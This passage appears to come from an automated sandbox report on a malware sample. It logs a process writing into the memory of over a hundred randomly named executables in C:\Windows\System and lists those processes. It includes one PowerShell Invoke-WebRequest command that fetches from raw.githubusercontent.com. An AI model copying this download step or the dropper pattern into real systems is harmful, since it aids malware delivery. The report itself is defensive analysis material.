PID 2936 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2936 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\zLGcPWb.exe
PID 2936 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\zLGcPWb.exe
PID 2936 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\zLGcPWb.exe
PID 2936 wrote to memory of 1788 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\mQFsvBO.exe
PID 2936 wrote to memory of 1788 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\mQFsvBO.exe
PID 2936 wrote to memory of 1788 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\mQFsvBO.exe
PID 2936 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\Cklaxgu.exe
PID 2936 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\Cklaxgu.exe
PID 2936 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\Cklaxgu.exe
PID 2936 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\fbeAOgx.exe
PID 2936 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\fbeAOgx.exe
PID 2936 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\fbeAOgx.exe
PID 2936 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\sLKnBhc.exe
PID 2936 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\sLKnBhc.exe
PID 2936 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\sLKnBhc.exe
PID 2936 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\sftvZTT.exe
PID 2936 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\sftvZTT.exe
PID 2936 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\sftvZTT.exe
PID 2936 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\gqbhrYH.exe
PID 2936 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\gqbhrYH.exe
PID 2936 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\gqbhrYH.exe
PID 2936 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\OmLirDO.exe
PID 2936 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\OmLirDO.exe
PID 2936 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\OmLirDO.exe
PID 2936 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\MhVjhhz.exe
PID 2936 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\MhVjhhz.exe
PID 2936 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\MhVjhhz.exe
PID 2936 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\mHtnkLe.exe
PID 2936 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\mHtnkLe.exe
PID 2936 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\mHtnkLe.exe
PID 2936 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\SIRraOO.exe
PID 2936 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\SIRraOO.exe
PID 2936 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\SIRraOO.exe
PID 2936 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\Msthvdb.exe
PID 2936 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\Msthvdb.exe
PID 2936 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\Msthvdb.exe
PID 2936 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\dPhRdxK.exe
PID 2936 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\dPhRdxK.exe
PID 2936 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\dPhRdxK.exe
PID 2936 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\OdTTrXW.exe
PID 2936 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\OdTTrXW.exe
PID 2936 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\OdTTrXW.exe
PID 2936 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\GSnpsQD.exe
PID 2936 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\GSnpsQD.exe
PID 2936 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\GSnpsQD.exe
PID 2936 wrote to memory of 1372 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\wKGUGVB.exe
PID 2936 wrote to memory of 1372 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\wKGUGVB.exe
PID 2936 wrote to memory of 1372 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\wKGUGVB.exe
PID 2936 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\DBalsZL.exe
PID 2936 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\DBalsZL.exe
PID 2936 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\DBalsZL.exe
PID 2936 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\hRkqUkH.exe
PID 2936 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\hRkqUkH.exe
PID 2936 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\hRkqUkH.exe
PID 2936 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\Bbdyuxd.exe
PID 2936 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\Bbdyuxd.exe
PID 2936 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\Bbdyuxd.exe
PID 2936 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\TQqamMI.exe
PID 2936 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\TQqamMI.exe
PID 2936 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\TQqamMI.exe
PID 2936 wrote to memory of 1320 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System\vglspTn.exe

Processes

C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe

"C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\zLGcPWb.exe

C:\Windows\System\zLGcPWb.exe

C:\Windows\System\mQFsvBO.exe

C:\Windows\System\mQFsvBO.exe

C:\Windows\System\Cklaxgu.exe

C:\Windows\System\Cklaxgu.exe

C:\Windows\System\fbeAOgx.exe

C:\Windows\System\fbeAOgx.exe

C:\Windows\System\sLKnBhc.exe

C:\Windows\System\sLKnBhc.exe

C:\Windows\System\sftvZTT.exe

C:\Windows\System\sftvZTT.exe

C:\Windows\System\gqbhrYH.exe

C:\Windows\System\gqbhrYH.exe

C:\Windows\System\OmLirDO.exe

C:\Windows\System\OmLirDO.exe

C:\Windows\System\MhVjhhz.exe

C:\Windows\System\MhVjhhz.exe

C:\Windows\System\mHtnkLe.exe

C:\Windows\System\mHtnkLe.exe

C:\Windows\System\SIRraOO.exe

C:\Windows\System\SIRraOO.exe

C:\Windows\System\Msthvdb.exe

C:\Windows\System\Msthvdb.exe

C:\Windows\System\dPhRdxK.exe

C:\Windows\System\dPhRdxK.exe

C:\Windows\System\OdTTrXW.exe

C:\Windows\System\OdTTrXW.exe

C:\Windows\System\GSnpsQD.exe

C:\Windows\System\GSnpsQD.exe

C:\Windows\System\wKGUGVB.exe

C:\Windows\System\wKGUGVB.exe

C:\Windows\System\DBalsZL.exe

C:\Windows\System\DBalsZL.exe

C:\Windows\System\hRkqUkH.exe

C:\Windows\System\hRkqUkH.exe

C:\Windows\System\Bbdyuxd.exe

C:\Windows\System\Bbdyuxd.exe

C:\Windows\System\TQqamMI.exe

C:\Windows\System\TQqamMI.exe

C:\Windows\System\vglspTn.exe

C:\Windows\System\vglspTn.exe

C:\Windows\System\wNZMGiu.exe

C:\Windows\System\wNZMGiu.exe

C:\Windows\System\rUaGoxM.exe

C:\Windows\System\rUaGoxM.exe

C:\Windows\System\YKZfSTm.exe

C:\Windows\System\YKZfSTm.exe

C:\Windows\System\UaSPdxs.exe

C:\Windows\System\UaSPdxs.exe

C:\Windows\System\DYRIhfB.exe

C:\Windows\System\DYRIhfB.exe

C:\Windows\System\cOrITQH.exe

C:\Windows\System\cOrITQH.exe

C:\Windows\System\fJprSFw.exe

C:\Windows\System\fJprSFw.exe

C:\Windows\System\QieheqP.exe

C:\Windows\System\QieheqP.exe

C:\Windows\System\hyTSDbk.exe

C:\Windows\System\hyTSDbk.exe

C:\Windows\System\qkBFAQU.exe

C:\Windows\System\qkBFAQU.exe

C:\Windows\System\QGGqJKa.exe

C:\Windows\System\QGGqJKa.exe

C:\Windows\System\EVWKxVh.exe

C:\Windows\System\EVWKxVh.exe

C:\Windows\System\UOZEPpS.exe

C:\Windows\System\UOZEPpS.exe

C:\Windows\System\qChdeXc.exe

C:\Windows\System\qChdeXc.exe

C:\Windows\System\sHLCJEP.exe

C:\Windows\System\sHLCJEP.exe

C:\Windows\System\PTDltoy.exe

C:\Windows\System\PTDltoy.exe

C:\Windows\System\OMLMVxQ.exe

C:\Windows\System\OMLMVxQ.exe

C:\Windows\System\whZqEbZ.exe

C:\Windows\System\whZqEbZ.exe

C:\Windows\System\aHKIWtK.exe

C:\Windows\System\aHKIWtK.exe

C:\Windows\System\Wruzkcw.exe

C:\Windows\System\Wruzkcw.exe

C:\Windows\System\kRrBBbD.exe

C:\Windows\System\kRrBBbD.exe

C:\Windows\System\LkSrxnd.exe

C:\Windows\System\LkSrxnd.exe

C:\Windows\System\yhblSEe.exe

C:\Windows\System\yhblSEe.exe

C:\Windows\System\LSCjWCS.exe

C:\Windows\System\LSCjWCS.exe

C:\Windows\System\omzNmfB.exe

C:\Windows\System\omzNmfB.exe

C:\Windows\System\ESdzCqy.exe

C:\Windows\System\ESdzCqy.exe

C:\Windows\System\JLzXxeN.exe

C:\Windows\System\JLzXxeN.exe

C:\Windows\System\dtQKzUx.exe

C:\Windows\System\dtQKzUx.exe

C:\Windows\System\DCLCiHY.exe

C:\Windows\System\DCLCiHY.exe

C:\Windows\System\CmZJrAM.exe

C:\Windows\System\CmZJrAM.exe

C:\Windows\System\CfqPGyp.exe

C:\Windows\System\CfqPGyp.exe

C:\Windows\System\mOsacio.exe

C:\Windows\System\mOsacio.exe

C:\Windows\System\nEZVesq.exe

C:\Windows\System\nEZVesq.exe

C:\Windows\System\FMDAFra.exe

C:\Windows\System\FMDAFra.exe

C:\Windows\System\IvTLFja.exe

C:\Windows\System\IvTLFja.exe

C:\Windows\System\xCYvitD.exe

C:\Windows\System\xCYvitD.exe

C:\Windows\System\DnkxgtF.exe

C:\Windows\System\DnkxgtF.exe

C:\Windows\System\LHdTzsw.exe

C:\Windows\System\LHdTzsw.exe

C:\Windows\System\VErGPwE.exe

C:\Windows\System\VErGPwE.exe

C:\Windows\System\KJyfaBf.exe

C:\Windows\System\KJyfaBf.exe

C:\Windows\System\YAFRjSj.exe

C:\Windows\System\YAFRjSj.exe

C:\Windows\System\irdJWee.exe

C:\Windows\System\irdJWee.exe

C:\Windows\System\NkaZDDP.exe

C:\Windows\System\NkaZDDP.exe

C:\Windows\System\YIGqNpj.exe

C:\Windows\System\YIGqNpj.exe

C:\Windows\System\vlAEuTQ.exe

C:\Windows\System\vlAEuTQ.exe

C:\Windows\System\DZwPGxI.exe

C:\Windows\System\DZwPGxI.exe

C:\Windows\System\gcSmoCP.exe

C:\Windows\System\gcSmoCP.exe

C:\Windows\System\PIPEUEA.exe

C:\Windows\System\PIPEUEA.exe

C:\Windows\System\yZGZihI.exe

C:\Windows\System\yZGZihI.exe

C:\Windows\System\CpXEYbS.exe

C:\Windows\System\CpXEYbS.exe

C:\Windows\System\VDGabjd.exe

C:\Windows\System\VDGabjd.exe

C:\Windows\System\LKiXZed.exe

C:\Windows\System\LKiXZed.exe

C:\Windows\System\nRJerhr.exe

C:\Windows\System\nRJerhr.exe

C:\Windows\System\TgVoiFH.exe

C:\Windows\System\TgVoiFH.exe

C:\Windows\System\iLBXBbT.exe

C:\Windows\System\iLBXBbT.exe

C:\Windows\System\bTWpeoc.exe

C:\Windows\System\bTWpeoc.exe

C:\Windows\System\xyELsas.exe

C:\Windows\System\xyELsas.exe

C:\Windows\System\fmWAUnS.exe

C:\Windows\System\fmWAUnS.exe

C:\Windows\System\ZBEikhA.exe

C:\Windows\System\ZBEikhA.exe

C:\Windows\System\clwisPU.exe

C:\Windows\System\clwisPU.exe

C:\Windows\System\MXPuGhA.exe

C:\Windows\System\MXPuGhA.exe

C:\Windows\System\xcqBRHU.exe

C:\Windows\System\xcqBRHU.exe

C:\Windows\System\CmBdwPY.exe

C:\Windows\System\CmBdwPY.exe

C:\Windows\System\DCgMfcA.exe

C:\Windows\System\DCgMfcA.exe

C:\Windows\System\epESlPr.exe

C:\Windows\System\epESlPr.exe

C:\Windows\System\uqRRQwB.exe

C:\Windows\System\uqRRQwB.exe

C:\Windows\System\smgLPic.exe

C:\Windows\System\smgLPic.exe

C:\Windows\System\QeFknlL.exe

C:\Windows\System\QeFknlL.exe

C:\Windows\System\fKmHNlR.exe

C:\Windows\System\fKmHNlR.exe

C:\Windows\System\AuEfIrT.exe

C:\Windows\System\AuEfIrT.exe

C:\Windows\System\meDFfWl.exe

C:\Windows\System\meDFfWl.exe

C:\Windows\System\cEvZHYH.exe

C:\Windows\System\cEvZHYH.exe

C:\Windows\System\wKWiLmL.exe

C:\Windows\System\wKWiLmL.exe

C:\Windows\System\nLZDFWv.exe

C:\Windows\System\nLZDFWv.exe

C:\Windows\System\KTILWZb.exe

C:\Windows\System\KTILWZb.exe

C:\Windows\System\XZnpibv.exe

C:\Windows\System\XZnpibv.exe

C:\Windows\System\qRGDkHX.exe

C:\Windows\System\qRGDkHX.exe

C:\Windows\System\kJaMFQy.exe

C:\Windows\System\kJaMFQy.exe

C:\Windows\System\aiQAdJb.exe

C:\Windows\System\aiQAdJb.exe

C:\Windows\System\OyIFNNv.exe

C:\Windows\System\OyIFNNv.exe

C:\Windows\System\JkBDACs.exe

C:\Windows\System\JkBDACs.exe

C:\Windows\System\eswnRME.exe

C:\Windows\System\eswnRME.exe

C:\Windows\System\bkjxBFg.exe

C:\Windows\System\bkjxBFg.exe

C:\Windows\System\zAOPvOa.exe

C:\Windows\System\zAOPvOa.exe

C:\Windows\System\QgMHwTl.exe

C:\Windows\System\QgMHwTl.exe

C:\Windows\System\XRWYVIT.exe

C:\Windows\System\XRWYVIT.exe

C:\Windows\System\fQCGgXt.exe

C:\Windows\System\fQCGgXt.exe

C:\Windows\System\HphdKpr.exe

C:\Windows\System\HphdKpr.exe

C:\Windows\System\OsDELoT.exe

C:\Windows\System\OsDELoT.exe

C:\Windows\System\LBpaUFL.exe

C:\Windows\System\LBpaUFL.exe

C:\Windows\System\mjlEnsi.exe

C:\Windows\System\mjlEnsi.exe

C:\Windows\System\ifzkdBT.exe

C:\Windows\System\ifzkdBT.exe

C:\Windows\System\PMUogIj.exe

C:\Windows\System\PMUogIj.exe

C:\Windows\System\AScCJCW.exe

C:\Windows\System\AScCJCW.exe

C:\Windows\System\CTTzarb.exe

C:\Windows\System\CTTzarb.exe

C:\Windows\System\WKstuZD.exe

C:\Windows\System\WKstuZD.exe

C:\Windows\System\xGRjucB.exe

C:\Windows\System\xGRjucB.exe

C:\Windows\System\ueAmsDv.exe

C:\Windows\System\ueAmsDv.exe

C:\Windows\System\qXgZwfb.exe

C:\Windows\System\qXgZwfb.exe

C:\Windows\System\TTqaQyi.exe

C:\Windows\System\TTqaQyi.exe

C:\Windows\System\nemMASu.exe

C:\Windows\System\nemMASu.exe

C:\Windows\System\uAneJpl.exe

C:\Windows\System\uAneJpl.exe

C:\Windows\System\iGdHkOt.exe

C:\Windows\System\iGdHkOt.exe

C:\Windows\System\YrtUpgK.exe

C:\Windows\System\YrtUpgK.exe

C:\Windows\System\xoXUGPy.exe

C:\Windows\System\xoXUGPy.exe

C:\Windows\System\fQGYBDP.exe

C:\Windows\System\fQGYBDP.exe

C:\Windows\System\KqzSQbp.exe

C:\Windows\System\KqzSQbp.exe

C:\Windows\System\rewqzGP.exe

C:\Windows\System\rewqzGP.exe

C:\Windows\System\yHzQZuI.exe

C:\Windows\System\yHzQZuI.exe

C:\Windows\System\zgXIjCl.exe

C:\Windows\System\zgXIjCl.exe

C:\Windows\System\PukVSiR.exe

C:\Windows\System\PukVSiR.exe

C:\Windows\System\ZsvMMvL.exe

C:\Windows\System\ZsvMMvL.exe

C:\Windows\System\ekBkWqO.exe

C:\Windows\System\ekBkWqO.exe

C:\Windows\System\GAVsVNx.exe

C:\Windows\System\GAVsVNx.exe

C:\Windows\System\PXxVlYa.exe

C:\Windows\System\PXxVlYa.exe

C:\Windows\System\PAgBvFP.exe

C:\Windows\System\PAgBvFP.exe

C:\Windows\System\TyaBukV.exe

C:\Windows\System\TyaBukV.exe

C:\Windows\System\XnJFnIT.exe

C:\Windows\System\XnJFnIT.exe

C:\Windows\System\JuPuvnm.exe

C:\Windows\System\JuPuvnm.exe

C:\Windows\System\YVbsINM.exe

C:\Windows\System\YVbsINM.exe

C:\Windows\System\VbnszgW.exe

C:\Windows\System\VbnszgW.exe

C:\Windows\System\HQyBbhB.exe

C:\Windows\System\HQyBbhB.exe

C:\Windows\System\ZbLPjii.exe

C:\Windows\System\ZbLPjii.exe

C:\Windows\System\ONMlkDk.exe

C:\Windows\System\ONMlkDk.exe

C:\Windows\System\pluOOPi.exe

C:\Windows\System\pluOOPi.exe

C:\Windows\System\JkrkVFZ.exe

C:\Windows\System\JkrkVFZ.exe

C:\Windows\System\GYzFWsA.exe

C:\Windows\System\GYzFWsA.exe

C:\Windows\System\asEbOdY.exe

C:\Windows\System\asEbOdY.exe

C:\Windows\System\FSRNnWs.exe

C:\Windows\System\FSRNnWs.exe

C:\Windows\System\KFFGfhF.exe

C:\Windows\System\KFFGfhF.exe

C:\Windows\System\UlEyxCj.exe

C:\Windows\System\UlEyxCj.exe

C:\Windows\System\IPqeUQq.exe

C:\Windows\System\IPqeUQq.exe

C:\Windows\System\uqQzGAv.exe

C:\Windows\System\uqQzGAv.exe

C:\Windows\System\OQBZniq.exe

C:\Windows\System\OQBZniq.exe

C:\Windows\System\lBUcMSp.exe

C:\Windows\System\lBUcMSp.exe

C:\Windows\System\LtoMlEh.exe

C:\Windows\System\LtoMlEh.exe

C:\Windows\System\gOgAREq.exe

C:\Windows\System\gOgAREq.exe

C:\Windows\System\WrDbqOC.exe

C:\Windows\System\WrDbqOC.exe

C:\Windows\System\zaZjUjL.exe

C:\Windows\System\zaZjUjL.exe

C:\Windows\System\CdyZVwy.exe

C:\Windows\System\CdyZVwy.exe

C:\Windows\System\TnnsOKO.exe

C:\Windows\System\TnnsOKO.exe

C:\Windows\System\uEoHRaG.exe

C:\Windows\System\uEoHRaG.exe

C:\Windows\System\dWklMBf.exe

C:\Windows\System\dWklMBf.exe

C:\Windows\System\UfpBxbP.exe

C:\Windows\System\UfpBxbP.exe

C:\Windows\System\lRSgmGz.exe

C:\Windows\System\lRSgmGz.exe

C:\Windows\System\AgeKcfI.exe

C:\Windows\System\AgeKcfI.exe

C:\Windows\System\ujJiKKo.exe

C:\Windows\System\ujJiKKo.exe

C:\Windows\System\mncktnk.exe

C:\Windows\System\mncktnk.exe

C:\Windows\System\AmNiUxd.exe

C:\Windows\System\AmNiUxd.exe

C:\Windows\System\PZzJndz.exe

C:\Windows\System\PZzJndz.exe

C:\Windows\System\ZALIuAN.exe

C:\Windows\System\ZALIuAN.exe

C:\Windows\System\ePomSKe.exe

C:\Windows\System\ePomSKe.exe

C:\Windows\System\MhEgaXB.exe

C:\Windows\System\MhEgaXB.exe

C:\Windows\System\TNakYGU.exe

C:\Windows\System\TNakYGU.exe

C:\Windows\System\ZmYKXXQ.exe

C:\Windows\System\ZmYKXXQ.exe

C:\Windows\System\xSYEmcN.exe

C:\Windows\System\xSYEmcN.exe

C:\Windows\System\yhddeGk.exe

C:\Windows\System\yhddeGk.exe

C:\Windows\System\hBAvflf.exe

C:\Windows\System\hBAvflf.exe

C:\Windows\System\WzVkVwJ.exe

C:\Windows\System\WzVkVwJ.exe

C:\Windows\System\AVMsGlk.exe

C:\Windows\System\AVMsGlk.exe

C:\Windows\System\cRLnyXB.exe

C:\Windows\System\cRLnyXB.exe

C:\Windows\System\lFItTyf.exe

C:\Windows\System\lFItTyf.exe

C:\Windows\System\vxueJfJ.exe

C:\Windows\System\vxueJfJ.exe

C:\Windows\System\GEekxTB.exe

C:\Windows\System\GEekxTB.exe

C:\Windows\System\lEsMuwh.exe

C:\Windows\System\lEsMuwh.exe

C:\Windows\System\svUjkjp.exe

C:\Windows\System\svUjkjp.exe

C:\Windows\System\kRYxNnB.exe

C:\Windows\System\kRYxNnB.exe

C:\Windows\System\sjAhWQE.exe

C:\Windows\System\sjAhWQE.exe

C:\Windows\System\sVkwUVF.exe

C:\Windows\System\sVkwUVF.exe

C:\Windows\System\aeptXbU.exe

C:\Windows\System\aeptXbU.exe

C:\Windows\System\vSpuXpB.exe

C:\Windows\System\vSpuXpB.exe

C:\Windows\System\nRRXUzr.exe

C:\Windows\System\nRRXUzr.exe

C:\Windows\System\FdaUeJx.exe

C:\Windows\System\FdaUeJx.exe

C:\Windows\System\GaDdikY.exe

C:\Windows\System\GaDdikY.exe

C:\Windows\System\CEQynKL.exe

C:\Windows\System\CEQynKL.exe

C:\Windows\System\uGQIYwf.exe

C:\Windows\System\uGQIYwf.exe

C:\Windows\System\iLXaaRr.exe

C:\Windows\System\iLXaaRr.exe

C:\Windows\System\fUymIJI.exe

C:\Windows\System\fUymIJI.exe

C:\Windows\System\YClUUtp.exe

C:\Windows\System\YClUUtp.exe

C:\Windows\System\hzpFMbp.exe

C:\Windows\System\hzpFMbp.exe

C:\Windows\System\ztHTXsa.exe

C:\Windows\System\ztHTXsa.exe

C:\Windows\System\CUueVkA.exe

C:\Windows\System\CUueVkA.exe

C:\Windows\System\iqHPMSy.exe

C:\Windows\System\iqHPMSy.exe

C:\Windows\System\RCIHQJC.exe

C:\Windows\System\RCIHQJC.exe

C:\Windows\System\umcbuAY.exe

C:\Windows\System\umcbuAY.exe

C:\Windows\System\TSVvFyQ.exe

C:\Windows\System\TSVvFyQ.exe

C:\Windows\System\ETioPnu.exe

C:\Windows\System\ETioPnu.exe

C:\Windows\System\VGqKXJI.exe

C:\Windows\System\VGqKXJI.exe

C:\Windows\System\ZZKWTBC.exe

C:\Windows\System\ZZKWTBC.exe

C:\Windows\System\UCNWSQY.exe

C:\Windows\System\UCNWSQY.exe

C:\Windows\System\XensKsc.exe

C:\Windows\System\XensKsc.exe

C:\Windows\System\MkcmqDm.exe

C:\Windows\System\MkcmqDm.exe

C:\Windows\System\dQDZkci.exe

C:\Windows\System\dQDZkci.exe

